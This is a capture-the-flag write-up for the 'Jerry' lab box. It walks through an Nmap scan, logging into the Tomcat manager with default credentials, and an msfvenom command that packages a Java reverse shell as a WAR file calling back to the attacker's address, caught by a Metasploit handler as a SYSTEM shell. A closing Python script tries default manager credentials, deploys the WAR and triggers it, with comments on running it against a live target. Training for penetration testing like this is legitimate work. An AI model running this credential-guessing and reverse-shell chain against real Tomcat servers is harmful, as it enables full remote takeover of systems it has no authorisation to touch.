Jerry is a beginner box that tests a user's ability to enumerate running services, locate default credentials, and package a reverse-shell payload as a WAR file that the target will deploy and run.

Step 1: Enumerate with Nmap

We first run Nmap against the target to see which ports are open and which services are listening. -p- scans all 65535 TCP ports, -Pn skips host discovery and treats the host as up, and -A enables version detection and the default NSE scripts.

➜  jerry nmap -A -v 10.129.136.9 -Pn -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-20 14:50 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:50
Completed NSE at 14:50, 0.00s elapsed
Initiating NSE at 14:50
Completed NSE at 14:50, 0.00s elapsed
Initiating NSE at 14:50
Completed NSE at 14:50, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:50
Completed Parallel DNS resolution of 1 host. at 14:50, 0.00s elapsed
Initiating Connect Scan at 14:50
Scanning 10.129.136.9 [65535 ports]
Discovered open port 8080/tcp on 10.129.136.9
Connect Scan Timing: About 20.11% done; ETC: 14:53 (0:02:03 remaining)
Connect Scan Timing: About 48.46% done; ETC: 14:53 (0:01:05 remaining)
Completed Connect Scan at 14:52, 104.31s elapsed (65535 total ports)
Initiating Service scan at 14:52
Scanning 1 service on 10.129.136.9
Completed Service scan at 14:52, 6.07s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.136.9.
Initiating NSE at 14:52
Completed NSE at 14:52, 1.00s elapsed
Initiating NSE at 14:52
Completed NSE at 14:52, 0.12s elapsed
Initiating NSE at 14:52
Completed NSE at 14:52, 0.00s elapsed
Nmap scan report for 10.129.136.9
Host is up (0.023s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

NSE: Script Post-scanning.
Initiating NSE at 14:52
Completed NSE at 14:52, 0.00s elapsed
Initiating NSE at 14:52
Completed NSE at 14:52, 0.00s elapsed
Initiating NSE at 14:52
Completed NSE at 14:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.05 seconds

Only a single port is open: Apache Tomcat on 8080, with the http-title script reading the exact version, 7.0.88, off the default page. Let's open it in a browser at http://10.129.136.9:8080.

Step 2: Searching for Default Credentials

The default Tomcat page links to the Manager App on the right, which prompts for HTTP Basic authentication. We first try the obvious default pair, admin:admin. That attempt fails with a 401, but the 401 error page Tomcat returns for the manager includes an example tomcat-users.xml snippet that defines the user tomcat with the password s3cret. Those credentials, tomcat:s3cret, log us into the manager app.

Step 3: Generate Reverse Shell Exploit Code and Start Listener

Upon logging in we are presented with a lot of information, but the "WAR file to deploy" upload form stands out as an attack vector: anything deployed through it runs as a web application with the privileges of the Tomcat service.

With manager access in hand, we can use msfvenom to package a Java reverse shell as a WAR file that Tomcat will happily deploy.

➜  jerry msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.86 LPORT=4444 -f war > jerry.war
Payload size: 13316 bytes
Final size of war file: 13316 bytes

We also need a listener to catch the connection back from the victim server; Metasploit's exploit/multi/handler simplifies this.

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/shell_reverse_tcp 
payload => java/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.10.14.86
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.86:4444 
[*] Command shell session 1 opened (10.10.14.86:4444 -> 10.129.136.9:49192) at 2023-01-20 15:09:46 -0500

The handler is configured with the same java/shell_reverse_tcp payload that msfvenom baked into the WAR, so both sides speak the same protocol. We supply the IP address or interface of the attacking machine (here tun0, which Metasploit resolves to 10.10.14.86) and the port, matching the LHOST and LPORT embedded in the payload, then run the handler and wait for the victim server to connect. The "Command shell session 1 opened" line in the output above only appears once the WAR has been uploaded and triggered in the next step.

Step 4: Exploit Target

After uploading jerry.war through the manager's "WAR file to deploy" form, Tomcat deploys it as a web application whose context path is taken from the filename, /jerry. Requesting http://10.129.136.9:8080/jerry/ executes the JSP inside the WAR, which spawns the reverse shell. Our listener then reports the session opened, and we land in a shell on the victim:

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

Running whoami returns nt authority\system: the Tomcat service on this box runs as SYSTEM, so the shell is already fully privileged and no separate privilege escalation is needed. All that is left is to navigate to each user's desktop and collect the flags.
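The credential check from Step 2 and the upload-and-trigger sequence from Step 4 can be scripted against the Tomcat Manager text API, which performs the same deploy operation as the HTML form. The following is an added example written for this writeup, not the author's tooling or Metasploit's: find_manager_creds tries a short list of common defaults against /manager/text/list, deploy_war PUTs the WAR to /manager/text/deploy, and trigger requests the new context so its JSP runs. It assumes the account has the manager-script role (the text API refuses accounts that only hold manager-gui with a 403; on such an account the HTML form used above is the fallback). So the script runs offline, a constructed FakeManager class stands in for the target and accepts only tomcat:s3cret; against the real box the base URL would be http://10.129.136.9:8080 and the WAR bytes would be the jerry.war produced by msfvenom.

```python
"""Tomcat Manager default-credential check and WAR deploy over the text API (added example)."""
import base64
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Commonly tried Tomcat manager defaults. tomcat:s3cret is the pair from the
# example tomcat-users.xml that Tomcat's own 401 page shows.
DEFAULT_CREDS = [
    ("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""), ("tomcat", ""),
    ("manager", "manager"), ("role1", "tomcat"), ("tomcat", "s3cret"),
]


def _request(url, auth=None, method="GET", data=None):
    """Return (status, body); HTTP error responses are returned rather than raised."""
    headers = {}
    if auth:
        token = base64.b64encode(f"{auth[0]}:{auth[1]}".encode()).decode()
        headers["Authorization"] = "Basic " + token
    req = urllib.request.Request(url, data=data, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def find_manager_creds(base, creds=DEFAULT_CREDS):
    """Return the first (user, password) that can list apps via the text API, else None.

    Only 200 plus an "OK" body proves access: 401 is a wrong password, 403 means the
    password is right but the account lacks the manager-script role.
    """
    for pair in creds:
        status, body = _request(f"{base}/manager/text/list", auth=pair)
        if status == 200 and body.startswith("OK"):
            return pair
    return None


def deploy_war(base, auth, path, war_bytes):
    """PUT a WAR to /manager/text/deploy; the same operation as the HTML upload form."""
    query = urllib.parse.urlencode({"path": path, "update": "true"})
    status, body = _request(f"{base}/manager/text/deploy?{query}", auth, "PUT", war_bytes)
    if status != 200 or not body.startswith("OK"):
        raise RuntimeError(f"deploy failed: {status} {body.strip()}")
    return body.strip()


def trigger(base, path):
    """Request the deployed context root so its JSP executes (this is what fires the shell)."""
    status, _ = _request(f"{base}{path}/")
    return status


class FakeManager(BaseHTTPRequestHandler):
    """Constructed stand-in for the Tomcat Manager endpoints used above (not real Tomcat)."""
    valid = "Basic " + base64.b64encode(b"tomcat:s3cret").decode()
    deployed = {}  # context path -> WAR bytes

    def _send(self, code, body):
        self.send_response(code)
        if code == 401:
            self.send_header("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')
        self.end_headers()
        self.wfile.write(body.encode())

    def do_GET(self):
        if self.path.startswith("/manager/"):
            if self.headers.get("Authorization") != self.valid:
                return self._send(401, "401 Unauthorized")
            return self._send(200, "OK - Listed applications for virtual host localhost\n")
        ctx = "/" + self.path.strip("/").split("/")[0]
        if ctx in self.deployed:
            return self._send(200, "<!-- payload JSP would execute here -->")
        return self._send(404, "404 Not Found")

    def do_PUT(self):
        war = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if self.headers.get("Authorization") != self.valid:
            return self._send(401, "401 Unauthorized")
        params = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
        ctx = params.get("path", ["/"])[0]
        self.deployed[ctx] = war
        self._send(200, f"OK - Deployed application at context path {ctx}\n")

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_fake_manager():
    """Serve FakeManager on a random loopback port in a daemon thread; return its base URL."""
    server = HTTPServer(("127.0.0.1", 0), FakeManager)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_port}"


if __name__ == "__main__":
    base = start_fake_manager()  # on the box: base = "http://10.129.136.9:8080"
    creds = find_manager_creds(base)
    print("manager creds:", creds)
    print(deploy_war(base, creds, "/jerry", b"PK\x03\x04 constructed stand-in for jerry.war"))
    print("trigger status:", trigger(base, "/jerry"))
```

Against a live target, start the multi/handler first, then run the script with the real base URL and the msfvenom WAR; the session opens when trigger() requests /jerry/.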